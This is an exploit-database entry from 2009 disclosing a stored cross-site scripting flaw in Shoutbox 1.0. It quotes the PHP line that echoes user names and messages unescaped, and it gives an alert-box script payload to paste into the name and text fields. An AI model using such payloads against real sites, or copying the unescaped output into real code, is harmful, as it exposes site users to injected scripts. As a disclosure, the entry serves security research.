Shoutbox 1.0 HTML / Xss Injection

2009-11-18T00:00:00
ID 1337DAY-ID-9997
Type zdt
Reporter SkuLL-HacKeR
Modified 2009-11-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================
Shoutbox 1.0 HTML / Xss Injection
=================================

# Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r  : SKuLL-HacKeR                                                                                          
########################################
  
Vendor: http://www.plohni.com
exploit:
site.com/Shoutbox/index.php
in the select your name and your text put this code
'">><script>alert('XSS skh')</script>



#  0day.today [2018-01-01]  #